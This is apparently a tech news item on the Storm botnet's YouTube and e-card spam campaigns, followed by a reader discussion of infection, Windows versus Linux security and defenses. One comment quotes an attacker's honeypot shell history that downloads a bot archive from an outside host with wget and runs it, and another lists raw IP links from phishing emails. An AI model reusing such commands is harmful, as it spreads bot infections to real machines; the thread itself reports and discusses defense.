Storm Botnet Is Behind Two New Attacks

We've gotten a number of submissions about the new tricks the massive Storm botnet has been up to. Estimates of the size of this botnet range from 250K-1M to 5M-10M compromised machines. Reader cottagetrees notes a writeup at Exploit Prevention Labs on a new social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video. The link is to a Storm-infected bot that attacks using the Q4Rollup exploit (a package of about a dozen encrypted exploits). And reader thefickler writes that the recent wave of "confirmation spam" is also due to Storm, as was the earlier, months-long "e-card from a friend" series of attack emails.

I had a 500% increase in Spam on Tuesday Last Week

I wonder if the huge spike in spam from Tuesday is at all related to this botnet... It was crushing, we had so many users complaining about slow mail service, and it was traced back to a maxed out mail server diligently blocking the spam. The storm passed by Wednesday, but it did so us that we need to upgrade our infrastructure.

I fscking hate SPAM!

Skynet...

It's looking for more processing power...

http://www.emhsoft.com/singularity/ [emhsoft.com]

YKIMS!

 

How does the infection spread?

I'm curious just how this works - what does a recipient of this email need to do to get infected?

First they need to open the message. It should have gotten filtered into a junk folder (if not blocked altogether) so the user must be actually going through their junk mail folder and reading things. Who has time to waste on that?

Now, I'd assume noone will get infected just by opening the mail. They'd have to at the very least click on the link. Will clicking be enough to infect a computer? Does it depend on the brand of browser and/or how recently it has been patched? Is the latest (Oh, let me pick a browser out of a hat here) IE6/IE7 in fully patched form still vulnerable?

Now of course, if anyone is dumb enough to follow the link, AND accept an executable download, AND run that download, they will be infected. Is that what's actually happening here?

Re:How does the infection spread?

Yes. But remember, the mail message pretents to be something like an e-card from a friend. You have to click on the link to see the e-card.
Many naive users would really want to see the e-card their friend has sent (even though it is never mentioned who that friend may be) so they click the link.
The next page explains they have to load some software. Not to unusual in the naive user's world. They visit websites all the time that tell them that they have to update their flash plugin, a codec, an active-x component, or whatever. They already click away those pop-ups that warn them before they have actually read them.
Besides, the first page explains that they have to click OK and go through the installation or they will not be able to see the card. Who would want to turn down their friend and not view an e-card sent to them?

So the trojan is downloaded and installed. No problem, because they are logged in as an administrator. Who sets up their system to use separate accounts for admin and use? Maybe 1% of users try that.

So, the naive user very easily gets infected. Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience".
Furthermore, most users are not prepared to think about security or to take extra steps to secure their systems (like using a separate account for software installation and system maintenance).

Re:How does the infection spread?

Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience".

Exactly. That's as if you had sensors in your clothes to ring a bell every time someone touches you, because he might be a pickpocket. I guarantee you that after one day in the city, you'll turn it off. Or if you can't do that, start to ignore it. Boom, suddenly you are an easier target than you would be without the "alarm system". You got desensitised.

Oh, and also because most of those warnings are really not useful for the user. They shove the responsibility on the one person least suited to actually make the call. "Hey, loser, W32kdrv.dll wants to access 0xf4a50cb to do CrypicThing() which could result in Lengthytechnobabblethatsoundsverymuchlikethenonsen seyouhearonstartreck - do you now want to disallow it not doing it?"

Arggg!

I hate these comments "Damn Microsoft and their inferior security". That's BS, the reason Windows gets hacked is because there are so many more MS machines than any other type of machine. Botnets are there to make money, the more machines they infect the more spam they produce, the more money tehy make. If you want to infect machines, you go for Windows because it has by far the most market share, so it returns the biggest profit. So all the people hacking machines aim at Windows, and multi-million dollar businesses solely aimed at hacking Windows, if any other operating system had that much focus given to it, it would collapse in days, so stop with all the shit about MS having bad security, they do quite a good job in the absolute worst circumstances and as a result only the stupid users get infections.

~Not AC cause I don't value my karma~

Re:Arggg!

Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that ocassionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.

Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!)

Windows is inherently less secure

the reason Windows gets hacked is because there are so many more MS machines than any other type of machine.

If that was the case, then why are Microsoft applications (like IIS) more often compromised than non-Microsoft applications even in areas where Microsoft is NOT dominant?

Windows is inherently less secure than most of the competition in a number of ways.

1. The Microsoft HTML control's use of ActiveX is inherently insecure and can not be fixed without breaking every application that uses the HTML control.
1a. This insecure design was deliberate and Microsoft fought the Justice Department to a standstill rather than change or replace it.
2. Windows requires a number of insecure services to run to perform routine operations.
2a. There is no way to force these services to be run local-only without using a firewall.
2b. This means that Windows Firewall has to be used to secure Windows to the same degree as a UNIX based system WITHOUT a firewall.
3. Windows document formats are still based on serialized COM objects. It's even possible for them to include serialized COM objects in XML files.
3a. Serialized COM objects can refer to or even contain insecure code that can be used for an attack.

The idea that any one of these three issues and theor consequent corollaries are accepted boggles my mind. The idea that they're defended by the claim that the only reason Windows is more often compromised is that it is more common...I can not conceive of the confusion in the mind that would lead to such a conclusion.

Now THESE guys...

...are more like the "terrorists" the government keeps telling us to cower under our desks from. I don't spend every morning checking under my hood and in my trunk to see if some guy with his head in a towel (-- that was to make a point, not my opinion) has managed to sneak a bomb in there. I _do_, however, check my inboxes everyday to delete the 30-40 spam/infected emails that show up.

Exchange 2003 SP2 IMF

Unless you've got GFI or Symantec Mail Security, I'd suggest setting up IMF. It's a free spam filter included in Exchange 2003 SP2. Below is a link to get you started.

http://www.petri.co.il/block_spam_with_exchange200 3_imf.htm [petri.co.il]

Obviously it doesn't prevent the spreading of SPAM, but it doesn't mean you have to live with the incoming onslaught.

Interesting Question

This whole scenario brings up a rather interesting question: Is this a Spam problem, or a virus problem?

From my understanding there is no viral content in the message, so your virus scanner would have no reason to block the message. A Spam filtering company could well "pass the buck" and say that this is a virus problem, yes it's going to trigger on some spam rules, but "Where it's a virus problem, why create special rules for it"

I can see this type of attack becoming more popular in the future, at least until this question is solved.

If only they could use the botnet for the good...

... of all mankind. A distributed computing project for the benefit of the human race. Like, cracking blu-ray DRM or something.

It's not just windows they're exploiting...

For instance, here's a recent attack to my honeypot (Running Slackware Linux)

root@zomg:~# cat /home/webmaster/. ./ .bash_history .ssh/ ../ .screenrc .xsession
root@zomg:~# cat /home/webmaster/.bash_history
ssh localhost
w
cat /etc/hosts
cat /proc/cpuinfo
passwd
cd /var/tmp
ks
l
sl
ls
ls- all
ls -all
mkdir " "
cd " "
clear
wget imaginez0r.xhost.ro/botme.tar.gz
tar zxvf botme.tar.gz
rm -rf botme.tar.gz
cd .bot/
PATH=.:$PATH
bash

These kind of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.

Re:It's not just windows they're exploiting...

Yeah, that link is just to an eggdrop-based bot. It connects to the irc channel and probably lets the next layer of the botnet know it's alive. This is one of many tools they use to fully exploit an open box. The bot probably has the ability to remote run commands. That script in the GP looked a lot like a human was doing the typing though, due to spelling errors, etc.

As far as xhost, You can get a free account [xhost.ro] too :). Storm is pretty scary, and there's bad people out there wanting to use your computing resources illegally.

Make sure you run logwatch and logrotate and md5 the logs when they rotate (and rotate frequently, like every minute). Then store the checksum somewhere innocent after rotating. Have logwatch automatically check the checksums on all existing logs and report on that also. hosts.deny everything but your own personal IP address (in hosts.allow) on all ports except those you need to do business. SSH ONLY, don't use telnet or other unencrypted connections. Don't allow root to connect from SSH. Don't allow su from ssh (if possible). Compile your own stuff (including your compiler), never run binaries. Use shadow passwords. Put all of your binaries on a read-only mounted partition, with /var /tmp on a read/write (this is pretty good to do if you have a stable setup, such as a web server). If you can't do that, break your services into virtualized boxes using Xen or VMware or something so you can quickly recover from a saved image if something does happen. Regularly nmap, nessus and satan your box for holes. Put a passive hardware sniffer between your box and the 'net to look for suspicious packets. Etc.

Most of this is duh stuff and easy to do, and you should have it written in your procedures for building a new box. I believe the NSA has some guidelines also.

was wondering about that

social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video.

I don't normally get much spam - maybe one every other week, but I've gotten two of those lately

OMG, what are you doing man. This video of you is all over the net. go look at it... http://www.youtube.com/watch?v=lAC5mj7oew5 [youtube.com] (link goes to http://90.31.69.105/ [90.31.69.105])

and

LMAO, I cant believe you put this video online. Everyone can see your face there. LOL check it out yourself http://www.youtube.com/watch?v=ZKil6gyJXhQ [youtube.com] (link goes to http://79.178.78.71/ [79.178.78.71] )

Look at all the retards with their owned boxes lowering our quality of life...

Idiot-proofing the ultimate tool

You know, I can go and buy a microwave oven and plug it safely into a standardized outlet and not electrocute myself or blow up my house. I can even buy a propane tank and fire up my grill without risking my life too much. I can buy a modern automobile and feel confident that if I drive it into a tree at 30 MPH or roll it over, I still have a reasonable chance of surviving. Most things have built-in standardized safety features and/or safe failure modes (within reason).

These things I can buy are all tools, some with licensing or age restrictions attached, but all more-or-less idiot-proofed. The razor blades I bought recently to scrape paint off my windows even warned me that they were "razor sharp". Well duh.

But the most sophisticated, most powerful, most versatile, general purpose tool we humans have yet invented, the networked personal computer, has been sold to and is used by millions of people without any training whatsoever and without any warnings outside of what one might pick up from the "Dangers in Cyberspace" fluff segment on the local news.

People are using computers more and more to organize all of their critical financial information. A single security breach can have catastrophic, real consequences, if for example your identity is stolen and your credit is ruined after your bank accounts are drained overnight.

All you have to do is click on one really bad link. Sometimes, not even that.

This is just another example of how technology is changing human society in completely unpredictable ways. Back in the 80's, you might have worried about a virus wiping out your word processing file. Today, typing your username and password on an untrusted machine, even just once, can compromise your entire life, and ruin your future.

Re:Idiot-proofing the ultimate tool

On the planet where I live, people are obliged to take practical and theoretical exams, to buy insurance for damage they may cause to others, and still the streets are full of armed government officials to make sure none of the hundreds of detailed rules are broken. This is considered a sane precaution to reduce road traffic accidents.
Extrapolating that I'm guessing that in a couple of decades the "I don't know what my computer does, so it's not my problem" defense is going to be as acceptable as "of course I ran over your daughter, I cannot drive a car at all".

You have an greeting card from an mate (click!)

I must say, it's good to know where all that was coming from. I rarely get spam, as I use a mailserver with greylisting, and any spam I do get is generally filtered correctly using Amavis/Spamassassin and ClamAV. This greeting card stuff though has plagued me. It's been marked as spam alright, but it looks like the botnets are starting to use proper SMTP servers to relay now, rather than just one shot attempts to directly connect to mailservers on port 25. A lot of outgoing traffic on port 25 is blocked from most ADSL networks nowadays, so it's more common to have to relay through your ISP's, or another relay server. This is going to make greylisting redundant pretty soon, as it works purely on the basis that any client connection which fails first time, will try again later as per the RFC's. If the Bots are relaying through RFC compliant servers, then there really isn't any point in the greylisting anymore. It's just a technology that provides a little temporary relief from the problem. Nice to know why the greeting card stuff started and stopped so abrubtly regardless.

Is there a point to this torture anymore?

After all this time and all these spams, isn't it fairly reasonable to assume that nearly everyone who is going to get their box owned by the trojan already has?

Does Storm Only Attack Windows?

Does Storm only attack Windows? Likely yes, I'm sure. Shouldn't Microsoft be attacking this one specifically with their malicious software scanner that's part of every Windows Update?

Does it read slashdot?

Maybe it's just coincidence, but I've been bombarded with the e-card things for a while now, and the youtube thing for a couple of days or so. Since this story broke on Slashdot, I just checked the spam trap and I haven't had a single one for the last 12 hours or so...

Disconnect them

Form a team of investigative experts. Find all the machines in a botnet and ask their ISP to disconnect them. If an ISP refuses to cooperate, get their upstream provider involved and start threatening disconnection for all users. They'll soon fall into line.

Post reasons why this is a bad idea here. I'm beginning to have difficulty understanding why so little action is being taken.

New Global Holiday

Let's call it "Tabula Rasa" day, or since that name is the name of an upcoming game, let's just call it "Global Reformat Day". Everyone in the world reformats their computer on that day.

Storm what? Yea, that's right, fuck you Storm, we just reformatted every computer connected to the internet today.

Yea I know, good luck getting everyone on board. I just wish it were possible because even though I don't know who operates these Botnets if I were to find out I would absolutely LOVE to kick them in the nuts.

How does this thing work?

I tried taking a closer look at this bot thing, but couldn't find out how it worked.

I set up a test system with a vmware'd winxp, running process monitor on the xp and wireshark on the host, wireshark only showing packets to and from the vmware xp's ip address.

So I snapshot'ed it, ran the exe from the links, and .. nothing happened. It did some write to a few files,

C:\WINDOWS\spooldr.exe
C:\WINDOWS\system32\spooldr.sys
C:\WINDOWS\system32\drivers\tcpip.sys

which looks scary enough. But apart from that, nothing seem to have happened. Nothing in wireshark, and nothing on the machine.
I rebooted the vmware xp and let it stand for a few hours. Still nothing at all. Only traffic in wireshark was smb announces, and nothing happened at the vmware. So, if this is a bot and/or a spam sender. How does it communicate? How does it send spam? How does it work?

Great...

Just great! How am I supposed to kick off my anonymous online greeting card company now?! Thanks a lot Storm!

w3player 3wplayer also bittorrent tojan attempts

The domain play3w.com seems to be involved in the hosting of questionable software in the form of a so-called media player that installs trojans onto ones software. A cursory search on the internet reveals that there are many media files floating around the internet, some legal, some obviously not, which are supposedly encoded with a codec used by this player, called w3player or 3wplayer. The media files seem to only display a message directing one to the site download.play3w.com [play3w.com] in order to download the software, which, upon installation throws up warning about a trojan being installed. In light of the current storm botnet growing to enormous proportions it is very likey that the site is involved in this in some way, given the wide distribution and use of bittorrent. This play3w scam seems to be widespread enough in fact, that there are other sites on the net that are also seeming to jump in on the act, such as mindcut.net [mindcut.net] (see 3wplayer link and almost everything on that site, in fact).

There is probably no better way to spread trojans and viruses these days than by way of bittorrent scams.

Please note, Tor is not associated in any way!

We sent this notice to slashdot days ago as a story, but it wasn't apparently interesting enough to post then...

====
The Tor Project, a US non-profit organisation producing Internet
privacy software, is issuing an urgent warning about a spam email
being circulated as a fake promotion for their software.

The real Tor software provides privacy on the Internet to journalists,
bloggers and human rights activists all over the world. The spam email
promotes the virtues of the software, but then directs people to a
series of fake websites that contain malicious code that will attempt
to take over visiting machines, and the downloaded software is fake
and equally dangerous to run.

The real website is hosted at http://tor.eff.org/ [eff.org] and the Tor
software can be downloaded from there. Users are able to check that
they have received the official version by following the instructions
at: http://wiki.noreply.org/noreply/TheOnionRouter/Ver ifyingSignatures [noreply.org]

Shava Nerad, Development Director for the Tor Project said, "I am
disgusted that criminals who want to recruit more machines for their
illegal activities should trade on our reputation for providing
privacy on the Internet. Fortunately we already have systems in place
so that people can verify that they are downloading the official
software. But this is a distraction from our work that we could do
without."
====

This attack does not, as reported elsewhere, download a trojaned version of Tor *or* use our network. All it (ab)uses is our reputation.

Shava Nerad
Development Director, The Tor Project

Re:Ha!

We don't get infected, but UNIX users still have to deal with the spam that the botnets are spewing.

I am really bloody sick of Microsoft's shoddy work. The spammers are arsonists, but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper.

-jcr

Re:Ha!

The spammers are arsonists, but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper.

OK, since you used the word "keeps building", I assume this is about more like Vista than Windows 95.

But if a trojan in Vista asks you to elevate its privilegies (due to UAC) to run administrative tasks such as installing itself in the system, and the user clicks yes, what should happen instead? This would be equivalent to a Linux user getting an email telling he needs to run some shady software under root privilegies, and the user saying "yes please, do that now".

Re:Ha!

If Unix / Linux was the dominant operating system of the day, who would you be blaming? Because this is purely a matter of the number of machines in the field; it's how attractive the target is.

Let's say that Windows was magically replaced by (say) Ubuntu installs tomorrow, all over the world, with the best known default configuration in terms of being secure. Within a day you'd have exploits, and rapidly growing botnets.

Ideally, *you* would then be ranting about the morons who wrote the kernel, the idiots who did the filtering and mail clients, the jerks who designed the network protocols, and the nincompoops who can't rub two curly braces together without creating a security hole.

Or you could do some research and realize that this stuff is just bloody hard to get right. By anyone. By people who have been doing this their entire careers.

Look, the security holes are *already there* on other platforms. Why aren't you ranting about them?

Meh.

Re:Ha!

Well, one point in favour of Linux security is the central software repository for each and every distro.

Linux users typically will not - even when the popularity of Linux rises - install random cursors, free smilies and whatnot - simply because they'll be used to installing things from the repository.

And it's quite simple to hammer that into people's heads: the software from the repository is safe. Other software is not.

There is still nothing similar in the Windows world.

Re:Ha!

Use TCP/IP stack fingerprinting and drop all packets from Microsoft operating systems at the edge of your network until they fix their OS?

We've found solutions; don't use shoddy software. The problem is all of the people who haven't switched yet.

Re:Ha!

Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they setup the Windows systems at their friends homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working

You mean it is the evil linux haxors that deliberately sabotage poor Microsoft?

That is hilarious.

Re:Ha!

Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they setup the Windows systems at their friends homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working

You mean it is the evil linux haxors that deliberately sabotage poor Microsoft?

That is hilarious.

Even worse: it's the good-natured Linux users who try to find a balance between Joe User's wants and needs on the one hand, and their own patience and free time on the other.

I tried. I really tried securing my ex-gf's family computer. I opened accounts for everyone. I only left admin privileges on one account. Set everything up.

Everybody just used the admin account again. Not even the fact that each could have their own desktop didn't entice them to use their own accounts; instead, they had one desktop full of five people's crud.

Re:Ha!

Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they setup the Windows systems at their friends homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working".

As long as the situation remains like this, there is little Microsoft can do.

No, they could arrange for the majority of their own user-targetted apps (e.g. Office) to refuse to run in read-write mode when run from an account with Admin privileges. They could clamp down on giving "Windows Certification" to things like printer drivers that require Admin privs to work (after installation). They could get similarly strict with applications. All those sorts of things. Make life actually workable for people who are running without high privs. And without doing that, they'll never manage to inculcate a culture of security, and there's an awful long way to go there, alas...

(BTW, if you're writing a GUI application for Linux, maybe you should think about taking similar steps. We cannot preach to others if our own house is not in order.)

Re:Ha!

I think what he meant was you can install but not use the app while logged in as an Administrator account, encouraging people to log in as users.

Re:Ha!

This is not crippling admin accounts, it is making apps behave in an administrative manner when run by an admin.

Staroffice 3.x was a brilliant example. When you ran its setup as root it automatically went into global per-machine setup mode, while running it as Joe Average User made it run a workstation setup. In fact Office 6.x for Windows 95/NT behaved in a similar manner as well. If you ran it from a network install it behaved differently when run as admin vs when run as an average user.

I have no idea why developers stopped doing that. IMO, that was the right behaviour.

B.S.

"Until Microsoft deploys a fundamentally more secure OS or people simply stop using Windows to any great extent, there is nothing we can do"

Ok, I call Bullshit.

1. Microsoft DID come out with this "more secure" OS. Like it or not, Vista is a major improvement. But it gets SLAMMED by the average /.'er for the UAC prompts. However, the user is only shown a prompt when an application is doing things that people in this thread are saying applications should not be allowed to do. No, UAC is not an elegant solution. But the problem is that an entire ecosystem of software exists that was not written with an eye on security. These apps are doing things that apps should not be doing, often time just to make things easier on the programmer.. Microsoft needs to throw a UAC when this happens. In time, more and more apps will play by the rules and not throw prompts.

This is a tangent, but still to the point: MSFT is dammed if they do, dammed if they don't.

2. Linux/OSX/Whatever isn't perfect. BY FAR. Right now, the reward is SO GREAT for hacking on windows boxes. You only have to scale a 6 foot fence to gain access to multi-millions of users. In, say, linux, or OSX you have to scale a 9 foot fence to gain access to a fraction of that. Right now, cracking Windows just makes sense for crackers. But you (and others) seem to think that botnets would just go away forever if only Microsoft gets their act together. That's insane. People are getting RICH off botnets. You think they're just going to stop because the game got a bit tougher? No way... As the reward factor of Windows diffuses down to the level of the other mainstream OS's, you'll see they'll get attacked more, too.

3. Microsoft isn't going anywhere. This is the nature of the game, people! So sitting around here talking about "When everyone switches" or whatever is just silly. It's childish. You think you're part of the solution b/c you run an alternative OS? You're not. If you want to be part of the solution, start thinking about how to defeat these people in a way that doesn't involve bashing Windows.

Your approach is a LOT like saying "Terrorism won't be a problem once everyone switches to Christianity."

Re:Ha!

Agreed, but the other thing about this problem that really seems to burn all the sysadmins and network admins and IT geeks out here is that with all the amazing knowledge and problem solving abilities, no one has been able to devise an elegant solution to this problem.

That's because there is no elegant solution to social eng. attacks. The extent of human ignorance is obscene.

I bet if I sent out some random crap exe to a bunch of people, which when opened it would popup a box that said, "h4ck.exe would like to steal your credit card numbers, shit in your bed, and screw your girlfriend. Would you like to continue?" Ok, or cancel. And some people STILL would click ok.

Re:Ha!

I can show you a custom-hardened build of Windows Server 2003

Umm... So what? You go to great lengths to lock down a windows machine, and good for you. It doesn't help the millions of people affected by the bugs present in a pristine install of any MS product.

-jcr

Re:Ha!

If UNIX/Linux became the desktop standard and had 80% of the market it would be fully assaulted by exploiters and script kiddies. We are not immune, we are simply not as big of a target because of Windows market share. I don't think the magnitude of the problems would be the same, but to say it will (or could) never happen to *nix or OS X is naive.

Re:Thank you Microsoft

Hope your happy Billyboy Gates!

Hope my happy Billyboy Gates what?!

Re:250k to 10M bots?

250k is still a lot. Enough to spew 64 gigabits per second of data, assuming each infested machine had a 256k uplink [and ignoring other factors]. That's enough to take out a decent sized datacenter.

On the other end, 10 million could possibly take out a entire ISP, and I'm talking about a backbone ISP too. THAT'S terrifying stuff.

Re:Ha!

Never will happen to os x or other *nix systems. .. and just where the hell do you think the term 'rootkit' came from?

this kind of hubris is what can make osx/linux/whatever a zombie just as fast as anything else out there.

i guess you never heard of the old sendmail worm, php-based exploits, etc etc ... ? and i guess i just imagine those security advisories IBM puts out for AIX...

if you do no work to insure your OS is as tight as necessary, regardless of what that OS is, you will leave yourself open to being improperly utilized as a system.

-r

Re:Thank you Microsoft

Hope your happy Billyboy Gates!

I'm not sure which is worse: unpatched Windows machines, or Linux boxes without the critical patch that allows fanboys to type the word "you're."

Re:Thank you Microsoft

My Linux box works fine. I'm not sure what you're problem is. ;-)

Re:Ha!

Actually, there are gaping holes in MacOS X as well. If I send out an email with a file attached (eg. .dmg), I can make the recipient install distributed.net, believing he is just getting a business card. Provided of course the user is an administrator and that he opens the businesscard-like installer. Not that long ago Apple patched a hole, where a code was run when you opened a creatively made .dmg file. New holes keep cropping up, but in the end, the biggest hole is the trusting user who use the default login user, which is an administrator.

And that hole is the same, no matter if you run Windows, MacOS X, Linux or MyLittlePonyOS

Re:Thank you Microsoft

Without your poor security record and woeful OS, spammers wouldn't have this huge arsenal at their disposal. Furthermore, companies and people wouldn't be earning billions a year fighting this crap. Hope your happy Billyboy Gates!

There, fixed that for ya

Re:Pwn The Botnet?

what would you say makes a botnet inherently insecure? The bot can patch the exploits it used to get in and can be made to only take and relay commands if they are cryptographically signed by the bonets owner. That way taking over one machine from the botnet doesn't really get you any further towards compromising the net as a whole.